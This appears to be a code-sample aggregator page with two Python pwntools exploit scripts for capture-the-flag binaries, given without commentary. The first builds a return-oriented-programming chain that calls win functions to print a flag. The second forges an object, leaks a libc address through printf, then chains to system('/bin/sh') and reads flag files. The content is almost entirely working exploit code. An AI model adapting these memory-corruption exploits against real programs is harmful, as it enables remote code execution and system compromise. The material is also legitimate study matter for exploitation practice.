Exemplo n.º 1
0
def main():
    elf_name = '/problems/rop-chain_2_d25a17cfdcfdaa45844798dd74d03a47/rop'
    elf = ELF(elf_name)
    offset_buf_to_eip = 0x18 + 4

    p = process(elf_name)

    rop_chain = ROP(elf)
    rop_chain.win_function1()
    rop_chain.win_function2(0xBAAAAAAD)
    rop_chain.flag(0xDEADBAAD)

    log.info(rop_chain.dump())

    payload = 'A' * offset_buf_to_eip
    payload += str(rop_chain)
    assert ('\n' not in payload)
    p.sendlineafter('input> ', payload)

    print(p.recv(4096))
Exemplo n.º 2
0
    def exploit(self):
        elf = self.elf
        libc = self.libc
        libc.symbols['OneGadget'] = 0x41320
        libc.symbols['/bin/sh'] = 0x001633e8
        base_data = 0x80

        #    (gdb) x/xg 0x00601560
        #    0x601560:       0x0000001500000064
        Turtle_say_sel_id = 0x0000001500000064

        with self.get_process(ld_linux=True) as self.p:

            # -- stage 1 ---------------------------------------------------------------

            ADDR_turtle = self.get_turtle_address()
            log.info('turtle : %s', hex(ADDR_turtle))
            data = '%sEND'
            ADDR_data = ADDR_turtle + base_data

            rop_chain = ROP(elf)
            rop_chain.printf(ADDR_data, elf.got['setvbuf'])
            rop_chain.main()
            log.debug('ROP CHAIN: \n%s', rop_chain.dump())

            payload = Attack.create_fake_turtle(ADDR_turtle, rop_chain.chain(),
                                                data, Turtle_say_sel_id)
            assert ('\n' not in payload)
            self.p.sendline(payload)

            if args.GDB:
                pause()

            leak = self.p.recvuntil('END', drop=True)
            ADDR_setvbuf = u64(leak.ljust(8, '\x00'))
            libc.address = ADDR_setvbuf - libc.symbols['setvbuf']
            ADDR_bin_sh = libc.symbols['/bin/sh']
            log.info('setvbuf   : %s', hex(ADDR_setvbuf))
            log.info('libc      : %s', hex(libc.address))
            log.info('/bin/sh   : %s', hex(ADDR_bin_sh))

            # -- stage 2 ---------------------------------------------------------------

            if args.GDB:
                pause()

            ADDR_turtle1 = self.get_turtle_address()
            log.info('turtle2   : %s', hex(ADDR_turtle1))
            data = '/bin/sh\x00'
            ADDR_data = ADDR_turtle1 + base_data

            rop_chain2 = ROP(libc)
            rop_chain2.system(ADDR_bin_sh)
            log.debug('ROP CHAIN: \n%s', rop_chain2.dump())

            payload = Attack.create_fake_turtle(ADDR_turtle1,
                                                rop_chain2.chain(), data,
                                                Turtle_say_sel_id)
            assert ('\n' not in payload)
            self.p.sendline(payload)

            self.p.sendline('ls -laF')
            self.p.sendline('cat flag*')
            self.p.interactive()